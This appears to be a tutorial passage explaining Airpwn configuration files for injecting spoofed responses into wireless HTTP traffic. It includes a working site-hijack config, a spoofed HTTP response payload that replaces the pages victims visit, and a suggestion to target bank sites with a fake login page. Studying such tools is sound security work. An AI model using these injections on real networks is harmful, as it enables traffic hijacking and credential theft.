Airpwn configuration files are simple text files that contain one or more request/response blocks. These blocks start with the begin directive followed by a match expression, an optional ignore expression, and a response filename.
The match expression is a regular expression that is applied to every wireless packet sent from a client to the AP. If the expression matches, the data contained within the response filename is injected back to the client, appearing to come from the AP. If an ignore expression is specified, the data is injected only if the expression does not match. Both the match and ignore expressions use the Perl Compatible Regular Expression (PCRE) syntax (see the pcrepattern manpage for more details on PCRE syntax).
Here is an example configuration file that injects the contents of file.txt when a packet containing the string cat but not dog is seen:
begin catnotdog match cat ignore dog response file.txt
The string after the begin keyword is the name of the request/response pair. This is displayed in the logs when the content is injected so that you know which data was just sent, since multiple request/response pairs can be active at any time.
Here's a more real-world example of a configuration file for performing site hijacking. The match expression finds HTTP requests, and the ignore expression skips any images or requests to the Google web site (you'll see why shortly):
begin site_hijack match ^(GET|POST).* ignore (^GET [^ ?]+\.(?i:jpg|jpeg|gif|png|ico|css)|(?i:host: .*google.com)) response site_hijack.txt
The file site_hijack.txt contains a spoofed HTTP response that creates a fullscreen iframe containing the Google search page and hides the real web page inside an HTML comment in a hidden div. The Google site is in the ignore expression because the match expression would match recursively infinitely if Google wasn't exempted. Here is the content of site_hijack.txt:
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 250
<html>
<head><title>hugs</title></head>
<body>
<iframe frameborder=0 border=0 src="http://google.com" width="100%"
height="100%">hugs</iframe>
<div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
BYE BYE!
<!—The size of the file is only 333 bytes, which fits cleanly into a single wireless frame, avoiding any problems with uncooperative wireless drivers.
The result of this configuration is that every web page the victim goes to becomes the Google search page. In effect, the entire Internet is now Google. This is a rather innocuous example. If, for instance, you limited the match expression to only trigger on bank web sites, and instead replaced the victim's page with your own fake bank login page, things could get nasty rather quickly.
Airpwn provides a number of example configuration files in the source distribution under the conf subdirectory. Looking through the examples is probably the best way to get ideas on what you can do with Airpwn.